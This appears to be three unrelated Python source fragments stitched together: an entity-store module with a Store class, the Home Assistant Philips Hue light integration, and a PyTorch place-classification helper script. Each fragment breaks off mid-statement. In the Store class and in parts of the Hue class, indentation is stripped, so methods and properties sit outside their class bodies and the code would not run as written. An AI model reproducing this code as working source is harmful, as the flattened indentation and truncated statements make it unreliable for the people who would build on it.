                        for orig_value_global_id in orig_value_global_ids:
                            orig_value = Store.access(Operation.GET, None, orig_value_global_id)
                            if orig_value is None:
                                no_match_found = True
                                break
                            else:
                                # look for any JSON entry that matches this entity
                                match_found = False
                                for new_entity_global_id in match_to:
                                    new_value = json_entity_map[new_entity_global_id]
                                    if not new_value is None:
                                        sub_changed = compare_entity_to_json_simple(compare_sub_entity_fields[field], orig_value, new_value, json_entity_map, None, log_prefix="{}#".format(field.name))
                                        if len(sub_changed) == 0:
                                            match_found = True
                                            break
                                if not match_found:
                                    no_match_found = True
                                    break
                        if no_match_found:
                            changed[log_prefix+field.name] = {"orig_list_value": list(orig_value_global_ids), "new_list_value": list(new_entity_global_ids)}
    return changed
class Store():
@staticmethod
def load_unit_types(filenames):
    """Load meta type declarations from YAML files and register them.

    Each file must contain a top-level "types" mapping, which is handed
    to Store.load_types_from_dict.
    """
    for filename in filenames:
        with open(filename, "r") as tf:
            loaded__meta_types = yaml.load(tf, Loader=yaml.FullLoader)["types"]
            Store.load_types_from_dict(loaded__meta_types)
@staticmethod
def create_unit(unit_name, unit_id):
    """Return (creating if necessary) the unit entity registered as *unit_name*.

    Three cases:
    1. A regular, not-yet-registered unit: allocate its entity and register
       it in the enum map in both directions (name -> entity, entity -> name).
    2. Bootstrap: the built-in "entity"/"entity_meta" units do not exist yet,
       so build them and the core meta-type entities by hand; returns the
       meta unit in this case.
    3. Already registered: return the cached unit entity.
    """
    entity_map = globals()["_entity_map"]
    enum_map = globals()["_enum_map"]
    if not unit_name in [UNIT_ENTITY, UNIT_ENTITY_META] and not unit_name in enum_map:
        unit = Store.access(Operation.GET, None, UNIT_ENTITY, unit_id, EntityTypes.unit)
        # register both directions: name -> entity and entity -> name
        enum_map[unit_name] = unit
        enum_map[unit] = unit_name
        #print("Unit name: {} ({}), global id: {}".format(unit_name, unit.entity_id, unit.global_id()))
        unit.access(Operation.SET, 0, UnitMeta.id_cnt)
        unit.access(Operation.SET, unit_name, UnitMeta.name)
    elif not ( UNIT_ENTITY+":2:"+EntityTypes.unit.name ) in entity_map:
        # bootstrap: create the "entity" unit (id 1) and the "entity_meta" unit (id 2)
        unit = Store._create_entity(None, 1, None)
        # the root unit belongs to itself
        unit.unit = unit
        enum_map[UNIT_ENTITY] = unit
        enum_map[unit] = UNIT_ENTITY
        unit_meta = Store._create_entity(unit, 2, None)
        enum_map[UNIT_ENTITY_META] = unit_meta
        enum_map[unit_meta] = UNIT_ENTITY_META
        cnt = 0
        # NOTE(review): 'types' appears unused below — confirm before removing.
        types = {}
        # create one entity per core meta type, tracking the highest id seen
        for entity_type in EntityTypes:
            cnt += 1
            et = Store._create_entity(unit_meta, entity_type.id_value, None)
            enum_map[entity_type] = et
            enum_map[et] = entity_type
            if entity_type.id_value > cnt:
                cnt = entity_type.id_value
        unit.meta_type = enum_map[EntityTypes.unit]
        unit_meta.meta_type = enum_map[EntityTypes.unit]
        enum_map[EntityTypes.unit].meta_type = enum_map[EntityTypes.type_meta]
        Store._add_entity_to_store(unit)
        Store._add_entity_to_store(unit_meta)
        # wire up the core meta types and persist them
        for entity_type in [EntityTypes.type_meta, EntityTypes.unit, EntityTypes._entity_base, EntityTypes.meta_field]:
            et = enum_map[entity_type]
            et.meta_type = enum_map[EntityTypes.type_meta]
            enum_map[et.global_id()] = entity_type
            Store._add_entity_to_store(et)
            et.access(Operation.SET, entity_type.name, TypeMeta.name)
        unit.access(Operation.SET, 2, UnitMeta.id_cnt)
        unit.access(Operation.SET, UNIT_ENTITY, UnitMeta.name)
        unit_meta.access(Operation.SET, cnt, UnitMeta.id_cnt)
        unit_meta.access(Operation.SET, UNIT_ENTITY_META, UnitMeta.name)
        return unit_meta
    else:
        unit = enum_map[unit_name]
    return unit
@staticmethod
def _get_base_fields():
    """Return the global field names of the entity-base meta fields,
    in declaration order, as a tuple."""
    return tuple(
        Store._global_field_name(UNIT_ENTITY_META, EntityTypes._entity_base.name, bf.name)
        for bf in EntityBaseMeta
    )
@staticmethod
def _create_entity(unit, entity_id, meta_type):
    """Construct an Entity, resolving unit/meta_type references via the enum map.

    The new entity is added to the store only when both unit and meta_type
    are provided; the bootstrap path in create_unit builds bare entities first.
    """
    enum_map = globals()["_enum_map"]
    if unit and not isinstance(unit, Entity):
        unit = enum_map[unit]
    if meta_type and not isinstance(meta_type, Entity):
        meta_type = enum_map[meta_type]
    e = Entity(unit, entity_id, meta_type)
    if unit and meta_type:
        Store._add_entity_to_store(e)
    return e
@staticmethod
def _add_entity_to_store(e):
    """Index entity *e* in the global entity map under its global id.

    The stored value is a pair: (raw dict carrying the entity-base
    bookkeeping fields, the Entity object itself).

    The @staticmethod decorator was missing — added for consistency with
    the other Store helpers; callers already invoke this as
    Store._add_entity_to_store(e), so behavior is unchanged.
    """
    entity_map = globals()["_entity_map"]
    unit_field, meta_type_field, entity_id_field, committed_field = Store._get_base_fields()
    entity_map[e.global_id()] = ({
        unit_field: e.unit.global_id(),
        entity_id_field: e.entity_id,
        meta_type_field: e.meta_type.global_id(),
        committed_field: e.committed.name
    }, e)
@staticmethod
def increment_unit_counter(unit, requested_id):
    """Advance the unit's id counter and return the id to use.

    With requested_id None, a fresh id is allocated by incrementing the
    unit's id_cnt field. Otherwise the raw counter is raised to
    requested_id when it lags behind, and requested_id is returned.

    Idiom fix only: `== None` / `not x is None` replaced with
    `is None` / `is not None`; behavior unchanged.
    """
    if isinstance(unit, str):
        unit = globals()["_enum_map"][unit]
    unit_entity_map = globals()["_entity_map"][unit.global_id()][0]
    if requested_id is None:
        # allocate the next id
        return unit.access(Operation.CHANGE, 1, UnitMeta.id_cnt)
    elif unit.entity_id is not None:
        current_cnt = unit_entity_map.get("entity_meta:unit:id_cnt")
        if current_cnt is None or current_cnt < requested_id:
            unit_entity_map["entity_meta:unit:id_cnt"] = requested_id
        return requested_id
    # NOTE(review): implicitly returns None when unit.entity_id is None and
    # an explicit id was requested — preserved from the original.
@staticmethod
def load_types_from_enum(e, unit_meta_id):
    """Register all meta types and fields declared in enum *e*.

    First indexes every field's global name (plus the entity-base fields),
    then creates/updates the type and field entities for each meta type,
    keeping each unit's id counter ahead of the ids in use, and finally
    links the meta types into their units.

    Bug fix: the entity-base field registration used the leaked loop
    variable `field` for the "id" entry; it now uses `base_field`.
    Also removed the unused locals `field_config` and `max_order`.
    """
    entity_map = globals()["_entity_map"]
    enum_map = globals()["_enum_map"]
    unit_meta_types = {}
    # index every declared field under its global name
    for meta_type in e:
        for field in meta_type.fields_enum:
            global_name = Store._global_field_name(meta_type.unit_name, meta_type.name, field.name)
            enum_map[global_name] = {"datatype": field.value[0], "valuetype": field.value[1], "id": field.id_value, "field_order": field.order_value, "_enum": field}
            enum_map[field] = global_name
    # index the entity-base bookkeeping fields as well
    for base_field in EntityBaseMeta:
        global_name = Store._global_field_name(UNIT_ENTITY_META, EntityTypes._entity_base.name, base_field.name)
        # fixed: was field.id_value (leaked from the loop above)
        enum_map[global_name] = {"datatype": base_field.value[0], "valuetype": base_field.value[1], "id": base_field.id_value, "field_order": base_field.order_value, "_enum": base_field}
        enum_map[base_field] = global_name
    for meta_type in e:
        unit = Store.create_unit(meta_type.unit_name, unit_meta_id)
        if meta_type in enum_map:
            field_meta_type = enum_map[meta_type]
        else:
            # keep the unit's id counter ahead of the type id in use
            cnt = unit.access(Operation.GET, 0, UnitMeta.id_cnt)
            if meta_type.id_value > cnt:
                unit.access(Operation.SET, meta_type.id_value, UnitMeta.id_cnt)
            field_meta_type = Store.access(Operation.GET, None, meta_type.unit_name, meta_type.id_value, EntityTypes.type_meta)
            field_meta_type.access(Operation.SET, meta_type.name, TypeMeta.name)
            enum_map[meta_type] = field_meta_type
            enum_map[field_meta_type] = meta_type
            enum_map[field_meta_type.global_id()] = meta_type
        field_entities = []
        max_id_value = 0
        # create/update one meta-field entity per declared field
        for field in meta_type.fields_enum:
            global_name = Store._global_field_name(meta_type.unit_name, meta_type.name, field.name)
            field_entity = Store.access(Operation.GET, None, meta_type.unit_name, field.id_value, EntityTypes.meta_field)
            field_entity.access(Operation.SET, field.name, MetaField.name)
            field_entity.access(Operation.SET, field.order_value, MetaField.field_order)
            field_entity.access(Operation.SET, global_name, MetaField.global_name)
            field_entities.append(field_entity)
            if field.id_value > max_id_value:
                max_id_value = field.id_value
        for field_entity in field_entities:
            field_meta_type.access(Operation.ADD, field_entity, TypeMeta.fields)
        if max_id_value > 0:
            # keep the unit's id counter ahead of the highest field id
            cnt = unit.access(Operation.GET, 0, UnitMeta.id_cnt)
            if max_id_value > cnt:
                unit.access(Operation.SET, max_id_value, UnitMeta.id_cnt)
        unit_meta_types.setdefault(unit, []).append(field_meta_type)
    # finally link every meta type into its unit
    for unit, field_meta_types in unit_meta_types.items():
        for field_meta_type in field_meta_types:
            unit.access(Operation.ADD, field_meta_type, UnitMeta.meta_types)
@staticmethod
def access(operation, value, *path):
    """Thread-safe public entry point: delegates to _access while holding
    the global store lock."""
    with _store_lock:
        return Store._access(operation, value, *path)
@staticmethod
def _access(operation, value, *path):
entities = globals()["_entity_map"]
enum_map = globals()["_enum_map"]
local_ref = None
last_obj = None
remaining_path = None
idx = 0
last_global_id = None
last_entity_path = []
if len(path) > 0:
if operation == Operation.WALK and isinstance(path[0], list):
last_obj = path[0]
idx = 1
else:
unit, entity_id, meta_type = Entity._resolve_global_id(path[0])
if entity_id is None:
# path is done with 3 parts
if len(path) > 2 and ( path[1] is None or isinstance(path[1], int) ) and \
( isinstance( path[2], FieldProps ) or isinstance( path[2], Entity ) ):
entity_id = Store.increment_unit_counter(path[0], path[1])
local_ref = Entity._ref(path[0], entity_id, path[2])
idx = 3
else:
# found entity id on path[0]
local_ref = path[0]
idx = 1
if idx < len(path):
remaining_path = path[idx:]
else:
remaining_path = []
#print("Access 1: local_ref={}, path={}".format(local_ref, path))
if local_ref:
if not local_ref in entities:
last_obj = Store._create_entity(path[0], entity_id, path[2])
else:
last_obj = entities[local_ref][1]
last_global_id = last_obj.global_id()
path_length = len(remaining_path)
if last_obj and path_length == 0 and operation == Operation.GET:
if _messages_create_message:
_create_message(MessageType.ENTITY_ACCESS, {"path": last_entity_path, "op": operation}, [last_global_id])
return last_obj
else:
rv = None
if last_obj is None:
last_obj = [e[1] for e in entities.values()]
parent = last_obj
for last_idx in range(path_length):
key = remaining_path[last_idx]
#print("{}: Access 2: key={}".format(last_obj, key))
if last_obj is None:
last_obj = Store._access_data_create_container(parent, remaining_path[last_idx - 1], key)
elif isinstance(last_obj, Entity):
last_global_id = last_obj.global_id()
last_entity_path = path[last_idx:]
if isinstance(last_obj, str):
unit, entity_id, meta_type = Entity._resolve_global_id(last_obj)
if entity_id:
parent = entities[last_obj][1]
else:
parent = last_obj
else:
parent = last_obj
last_obj = Store._access_data_get_value(parent, key, None)
last_idx += 1
if operation == Operation.SET or operation == Operation.ADD or operation == Operation.CHANGE:
changed, rv = Store._access_data_set_value(parent, remaining_path[last_idx - 1], value, operation)
if changed and _messages_create_message:
_create_message(MessageType.ENTITY_ACCESS, | |
"""Support for the Philips Hue lights."""
from __future__ import annotations
from datetime import timedelta
from functools import partial
import logging
import random
import aiohue
import async_timeout
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_TRANSITION,
EFFECT_COLORLOOP,
EFFECT_RANDOM,
FLASH_LONG,
FLASH_SHORT,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.core import callback
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.update_coordinator import (
CoordinatorEntity,
DataUpdateCoordinator,
UpdateFailed,
)
from homeassistant.util import color
from .const import (
DOMAIN as HUE_DOMAIN,
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_LIGHT_SOURCE,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_ROOM,
REQUEST_REFRESH_DELAY,
)
from .helpers import remove_devices
SCAN_INTERVAL = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
# Feature bitmasks per Hue device class; each tier extends the previous one.
SUPPORT_HUE_ON_OFF = SUPPORT_FLASH | SUPPORT_TRANSITION
SUPPORT_HUE_DIMMABLE = SUPPORT_HUE_ON_OFF | SUPPORT_BRIGHTNESS
SUPPORT_HUE_COLOR_TEMP = SUPPORT_HUE_DIMMABLE | SUPPORT_COLOR_TEMP
SUPPORT_HUE_COLOR = SUPPORT_HUE_DIMMABLE | SUPPORT_EFFECT | SUPPORT_COLOR
SUPPORT_HUE_EXTENDED = SUPPORT_HUE_COLOR_TEMP | SUPPORT_HUE_COLOR
# Maps the Hue API's light "type" string to the supported-feature bitmask.
SUPPORT_HUE = {
    "Extended color light": SUPPORT_HUE_EXTENDED,
    "Color light": SUPPORT_HUE_COLOR,
    "Dimmable light": SUPPORT_HUE_DIMMABLE,
    "On/Off plug-in unit": SUPPORT_HUE_ON_OFF,
    "Color temperature light": SUPPORT_HUE_COLOR_TEMP,
}
ATTR_IS_HUE_GROUP = "is_hue_group"
GAMUT_TYPE_UNAVAILABLE = "None"
# Minimum Hue Bridge API version to support groups
# 1.4.0 introduced extended group info
# 1.12 introduced the state object for groups
# 1.13 introduced "any_on" to group state objects
GROUP_MIN_API_VERSION = (1, 13, 0)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Old way of setting up Hue lights.

    Can only be called when a user accidentally mentions hue platform in their
    config. But even in that case it would have been ignored.
    """
def create_light(item_class, coordinator, bridge, is_group, rooms, api, item_id):
    """Create the light entity for a single Hue API item.

    For a group, the supported features are the union of the features of the
    member lights known to the bridge (falling back to the extended set when
    none contribute); for a single light, they come straight from its type.
    """
    api_item = api[item_id]
    if not is_group:
        supported_features = SUPPORT_HUE.get(api_item.type, SUPPORT_HUE_EXTENDED)
    else:
        supported_features = 0
        known_lights = bridge.api.lights
        for light_id in api_item.lights:
            if light_id in known_lights:
                member = known_lights[light_id]
                supported_features |= SUPPORT_HUE.get(member.type, SUPPORT_HUE_EXTENDED)
        if not supported_features:
            # no member contributed anything: assume the full feature set
            supported_features = SUPPORT_HUE_EXTENDED
    return item_class(
        coordinator, bridge, is_group, api_item, supported_features, rooms
    )
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up the Hue lights from a config entry.

    Creates a polling coordinator for lights and — when the bridge API is new
    enough — one for groups, registers listeners that add entities as they
    appear, and maintains a light-id -> room-name map used as suggested areas.
    """
    bridge = hass.data[HUE_DOMAIN][config_entry.entry_id]
    api_version = tuple(int(v) for v in bridge.api.config.apiversion.split("."))
    # Shared mutable map: light id -> room name, refreshed by _async_update_rooms.
    rooms = {}
    allow_groups = bridge.allow_groups
    supports_groups = api_version >= GROUP_MIN_API_VERSION
    if allow_groups and not supports_groups:
        _LOGGER.warning("Please update your Hue bridge to support groups")
    light_coordinator = DataUpdateCoordinator(
        hass,
        _LOGGER,
        name="light",
        update_method=partial(async_safe_fetch, bridge, bridge.api.lights.update),
        update_interval=SCAN_INTERVAL,
        request_refresh_debouncer=Debouncer(
            bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
        ),
    )
    # First do a refresh to see if we can reach the hub.
    # Otherwise we will declare not ready.
    await light_coordinator.async_refresh()
    if not light_coordinator.last_update_success:
        raise PlatformNotReady
    if not supports_groups:
        # Old bridge firmware: set up lights only and bail out early.
        update_lights_without_group_support = partial(
            async_update_items,
            bridge,
            bridge.api.lights,
            {},
            async_add_entities,
            partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
            None,
        )
        # We add a listener after fetching the data, so manually trigger listener
        bridge.reset_jobs.append(
            light_coordinator.async_add_listener(update_lights_without_group_support)
        )
        return
    group_coordinator = DataUpdateCoordinator(
        hass,
        _LOGGER,
        name="group",
        update_method=partial(async_safe_fetch, bridge, bridge.api.groups.update),
        update_interval=SCAN_INTERVAL,
        request_refresh_debouncer=Debouncer(
            bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True
        ),
    )
    if allow_groups:
        # Optionally expose Hue groups themselves as light entities.
        update_groups = partial(
            async_update_items,
            bridge,
            bridge.api.groups,
            {},
            async_add_entities,
            partial(create_light, HueLight, group_coordinator, bridge, True, None),
            None,
        )
        bridge.reset_jobs.append(group_coordinator.async_add_listener(update_groups))
    cancel_update_rooms_listener = None

    @callback
    def _async_update_rooms():
        """Update rooms.

        Rebuilds the light-id -> room-name map from the current group data,
        then cancels itself (one-shot listener, re-armed when lights appear).
        """
        nonlocal cancel_update_rooms_listener
        rooms.clear()
        for item_id in bridge.api.groups:
            group = bridge.api.groups[item_id]
            if group.type != GROUP_TYPE_ROOM:
                continue
            for light_id in group.lights:
                rooms[light_id] = group.name
        # Once we do a rooms update, we cancel the listener
        # until the next time lights are added
        bridge.reset_jobs.remove(cancel_update_rooms_listener)
        cancel_update_rooms_listener()  # pylint: disable=not-callable
        cancel_update_rooms_listener = None

    @callback
    def _setup_rooms_listener():
        """(Re)arm the one-shot group listener that refreshes the rooms map."""
        nonlocal cancel_update_rooms_listener
        if cancel_update_rooms_listener is not None:
            # If there are new lights added before _async_update_rooms
            # is called we should not add another listener
            return
        cancel_update_rooms_listener = group_coordinator.async_add_listener(
            _async_update_rooms
        )
        bridge.reset_jobs.append(cancel_update_rooms_listener)

    _setup_rooms_listener()
    await group_coordinator.async_refresh()
    update_lights_with_group_support = partial(
        async_update_items,
        bridge,
        bridge.api.lights,
        {},
        async_add_entities,
        partial(create_light, HueLight, light_coordinator, bridge, False, rooms),
        _setup_rooms_listener,
    )
    # We add a listener after fetching the data, so manually trigger listener
    bridge.reset_jobs.append(
        light_coordinator.async_add_listener(update_lights_with_group_support)
    )
    update_lights_with_group_support()
async def async_safe_fetch(bridge, fetch_method):
    """Safely fetch data.

    Runs `fetch_method` through the bridge with a 4-second timeout and
    translates aiohue errors into UpdateFailed so the DataUpdateCoordinator
    can handle them uniformly.
    """
    try:
        with async_timeout.timeout(4):
            return await bridge.async_request_call(fetch_method)
    except aiohue.Unauthorized as err:
        # Give the bridge a chance to react to the auth failure before failing.
        await bridge.handle_unauthorized_error()
        raise UpdateFailed("Unauthorized") from err
    except aiohue.AiohueException as err:
        raise UpdateFailed(f"Hue error: {err}") from err
@callback
def async_update_items(
    bridge, api, current, async_add_entities, create_item, new_items_callback
):
    """Add entities for any API items not yet tracked in `current`.

    Also schedules stale-device cleanup, and invokes `new_items_callback`
    (when given) before handing new entities to Home Assistant.
    """
    fresh = []
    for item_id in api:
        if item_id not in current:
            entity = create_item(api, item_id)
            current[item_id] = entity
            fresh.append(entity)

    bridge.hass.async_create_task(remove_devices(bridge, api, current))

    if not fresh:
        return
    # This is currently used to setup the listener to update rooms
    if new_items_callback:
        new_items_callback()
    async_add_entities(fresh)
def hue_brightness_to_hass(value):
    """Convert hue brightness 1..254 to hass format 0..255."""
    scaled = round((value / 254) * 255)
    return scaled if scaled <= 255 else 255
def hass_to_hue_brightness(value):
    """Convert hass brightness 0..255 to hue 1..254 scale."""
    scaled = round((value / 255) * 254)
    return scaled if scaled >= 1 else 1
class HueLight(CoordinatorEntity, LightEntity):
"""Representation of a Hue light."""
    def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms):
        """Initialize the light.

        :param coordinator: DataUpdateCoordinator polling this light's state
        :param bridge: Hue bridge wrapper object
        :param is_group: True when `light` is a Hue group rather than a light
        :param light: aiohue light/group object
        :param supported_features: precomputed SUPPORT_* bitmask (see create_light)
        :param rooms: mapping light-id -> room name (None for groups)
        """
        super().__init__(coordinator)
        self.light = light
        self.bridge = bridge
        self.is_group = is_group
        self._supported_features = supported_features
        self._rooms = rooms
        if is_group:
            # Groups carry no manufacturer or gamut info: disable vendor quirks.
            self.is_osram = False
            self.is_philips = False
            self.is_innr = False
            self.is_ewelink = False
            self.is_livarno = False
            self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
            self.gamut = None
        else:
            # Vendor flags drive quirk handling elsewhere (effects, hue/sat, mireds).
            self.is_osram = light.manufacturername == "OSRAM"
            self.is_philips = light.manufacturername == "Philips"
            self.is_innr = light.manufacturername == "innr"
            self.is_ewelink = light.manufacturername == "eWeLink"
            self.is_livarno = light.manufacturername.startswith("_TZ3000_")
            self.gamut_typ = self.light.colorgamuttype
            self.gamut = self.light.colorgamut
            _LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut))
            if self.light.swupdatestate == "readytoinstall":
                err = (
                    "Please check for software updates of the %s "
                    "bulb in the Philips Hue App."
                )
                _LOGGER.warning(err, self.name)
            if self.gamut and not color.check_valid_gamut(self.gamut):
                # Invalid gamut data: fall back to gamut-free color conversion.
                err = "Color gamut of %s: %s, not valid, setting gamut to None."
                _LOGGER.debug(err, self.name, str(self.gamut))
                self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
                self.gamut = None
@property
def unique_id(self):
"""Return the unique ID of this Hue light."""
unique_id = self.light.uniqueid
if not unique_id and self.is_group and self.light.room:
unique_id = self.light.room["id"]
return unique_id
    @property
    def device_id(self):
        """Return the ID of this Hue light (alias of unique_id)."""
        return self.unique_id
    @property
    def name(self):
        """Return the name of the Hue light as reported by the bridge."""
        return self.light.name
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self.is_group:
bri = self.light.action.get("bri")
else:
bri = self.light.state.get("bri")
if bri is None:
return bri
return hue_brightness_to_hass(bri)
@property
def _color_mode(self):
"""Return the hue color mode."""
if self.is_group:
return self.light.action.get("colormode")
return self.light.state.get("colormode")
@property
def hs_color(self):
"""Return the hs color value."""
mode = self._color_mode
source = self.light.action if self.is_group else self.light.state
if mode in ("xy", "hs") and "xy" in source:
return color.color_xy_to_hs(*source["xy"], self.gamut)
return None
@property
def color_temp(self):
"""Return the CT color value."""
# Don't return color temperature unless in color temperature mode
if self._color_mode != "ct":
return None
if self.is_group:
return self.light.action.get("ct")
return self.light.state.get("ct")
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
if self.is_group:
return super().min_mireds
min_mireds = self.light.controlcapabilities.get("ct", {}).get("min")
# We filter out '0' too, which can be incorrectly reported by 3rd party buls
if not min_mireds:
return super().min_mireds
return min_mireds
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
if self.is_group:
return super().max_mireds
if self.is_livarno:
return 500
max_mireds = self.light.controlcapabilities.get("ct", {}).get("max")
if not max_mireds:
return super().max_mireds
return max_mireds
@property
def is_on(self):
"""Return true if device is on."""
if self.is_group:
return self.light.state["any_on"]
return self.light.state["on"]
@property
def available(self):
"""Return if light is available."""
return self.coordinator.last_update_success and (
self.is_group
or self.bridge.allow_unreachable
or self.light.state["reachable"]
)
    @property
    def supported_features(self):
        """Flag supported features (bitmask precomputed in create_light)."""
        return self._supported_features
    @property
    def effect(self):
        """Return the current effect, or None when the state has none."""
        return self.light.state.get("effect", None)
@property
def effect_list(self):
"""Return the list of supported effects."""
if self.is_osram:
return [EFFECT_RANDOM]
return [EFFECT_COLORLOOP, EFFECT_RANDOM]
@property
def device_info(self) -> DeviceInfo | None:
"""Return the device info."""
if self.light.type in (
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_ROOM,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_LIGHT_SOURCE,
):
return None
suggested_area = None
if self.light.id in self._rooms:
suggested_area = self._rooms[self.light.id]
return DeviceInfo(
identifiers={(HUE_DOMAIN, self.device_id)},
manufacturer=self.light.manufacturername,
# productname added in Hue Bridge API 1.24
# (published 03/05/2018)
model=self.light.productname or self.light.modelid,
name=self.name,
# Not yet exposed as properties in aiohue
suggested_area=suggested_area,
sw_version=self.light.raw["swversion"],
via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid),
)
async def async_added_to_hass(self) -> None:
"""Handle entity being added to Home Assistant."""
self.async_on_remove(
self.bridge.listen_updates(
self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state
)
)
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn the specified or all lights on."""
command = {"on": True}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
if ATTR_HS_COLOR in kwargs:
if self.is_osram:
command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535)
command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255)
else:
# Philips hue bulb models respond differently to hue/sat
# requests, so we convert to XY first to ensure a consistent
# color.
xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut)
command["xy"] = xy_color
elif ATTR_COLOR_TEMP in kwargs:
temp = kwargs[ATTR_COLOR_TEMP]
command["ct"] = max(self.min_mireds, min(temp, self.max_mireds))
if ATTR_BRIGHTNESS in kwargs:
command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS])
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash | |
import torch
import torch.nn as nn
from torchvision.datasets.vision import VisionDataset
from PIL import Image
import os, sys, math
import os.path
import torch
import json
import torch.utils.model_zoo as model_zoo
from Yolo_v2_pytorch.src.utils import *
from Yolo_v2_pytorch.src.yolo_net import Yolo
from Yolo_v2_pytorch.src.yolo_tunning import YoloD
import numpy as np
import torch.nn.functional as F
from Yolo_v2_pytorch.src.rois_utils import anchorboxes
from Yolo_v2_pytorch.src.anotherMissOh_dataset import FaceCLS
from lib.person_model import person_model
# Place-name -> class id. Both '' and 'none' map to class 9 ('none');
# labels starting with 'con' are normalized to 'convenience store' in
# label_mapping before lookup.
label_dict = {'' : 9, 'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
              'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
              'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
              }
# Same table without the '' alias; used for the inverse (id -> name) mapping.
label_dict_wo_none = {'beach':0, 'cafe':1, 'car':2, 'convenience store':3, 'garden':4, 'home':5, 'hospital':6, 'kitchen':7,
                      'livingroom':8, 'none':9, 'office':10, 'park':11, 'playground':12, 'pub':13, 'restaurant':14, 'riverside':15, 'road':16,
                      'rooftop':17, 'room':18, 'studio':19, 'toilet':20, 'wedding hall':21
                      }
def label_mapping(target):
    """Map raw place-name labels to integer class ids via `label_dict`.

    Labels starting with 'con' are normalized — in place, mutating `target` —
    to 'convenience store' before lookup.
    """
    mapped = []
    for entry in target:
        if entry[0][:3] == 'con':
            entry[0] = 'convenience store'
        mapped.append(label_dict[entry[0]])
    return mapped
def label_remapping(target):
    """Map integer class ids back to place names using label_dict_wo_none."""
    inverse = {v: k for k, v in label_dict_wo_none.items()}
    return [inverse[cls_id] for cls_id in target]
def conv3x3(in_planes, out_planes, stride=1):
    """Return a bias-free 3x3 convolution with padding 1."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
def accuracy(output, target, topk=(1,)):
    """Computes the accuracy over the k top predictions for the specified values of k.

    Args:
        output: logits of shape [batch, num_classes].
        target: ground-truth class indices of shape [batch].
        topk: iterable of k values to evaluate.

    Returns:
        List of 1-element tensors, one per k, holding the accuracy in percent.
    """
    with torch.no_grad():
        maxk = max(topk)
        batch_size = target.size(0)
        _, pred = output.topk(maxk, 1, True, True)
        pred = pred.t()
        correct = pred.eq(target.view(1, -1).expand_as(pred))
        res = []
        for k in topk:
            # reshape (not view): `correct[:k]` can be non-contiguous because
            # `pred` was transposed above; `.view(-1)` raises on recent PyTorch.
            correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
            res.append(correct_k.mul_(100.0 / batch_size))
        return res
def place_buffer(images_norm, buffer_images):
    """Left-pad `buffer_images` with the first frame of `images_norm`
    until it holds exactly 10 entries.

    An empty buffer is first seeded with `images_norm` itself.
    """
    if not buffer_images:
        buffer_images = images_norm
    pad = 10 - len(buffer_images)
    if pad > 0:
        buffer_images = [images_norm[0]] * pad + buffer_images
    assert len(buffer_images) == 10, 'Buffer failed'
    return buffer_images
class AverageMeter(object):
    """Tracks the most recent value and running average of a metric."""

    def __init__(self, name, fmt=':f'):
        self.name = name
        self.fmt = fmt
        self.reset()

    def reset(self):
        """Clear all statistics."""
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record `val` observed `n` times and refresh the running average."""
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count

    def __str__(self):
        template = '{name} {val%s} ({avg%s})' % (self.fmt, self.fmt)
        return template.format(**self.__dict__)
class ProgressMeter(object):
    """Pretty-prints a batch counter followed by a set of AverageMeters."""

    def __init__(self, num_batches, meters, prefix=""):
        self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
        self.meters = meters
        self.prefix = prefix

    def display(self, batch):
        """Print one tab-separated progress line for `batch`."""
        parts = [self.prefix + self.batch_fmtstr.format(batch)]
        parts.extend(str(meter) for meter in self.meters)
        print('\t'.join(parts))

    def _get_batch_fmtstr(self, num_batches):
        # `// 1` kept from the original (it truncates a float batch count).
        width = len(str(num_batches // 1))
        fmt = '{:' + str(width) + 'd}'
        return '[' + fmt + '/' + fmt.format(num_batches) + ']'
# Default per-class sample counts for CB_loss (presumably training-set class
# frequencies — TODO confirm). NOTE(review): the two 0 entries make
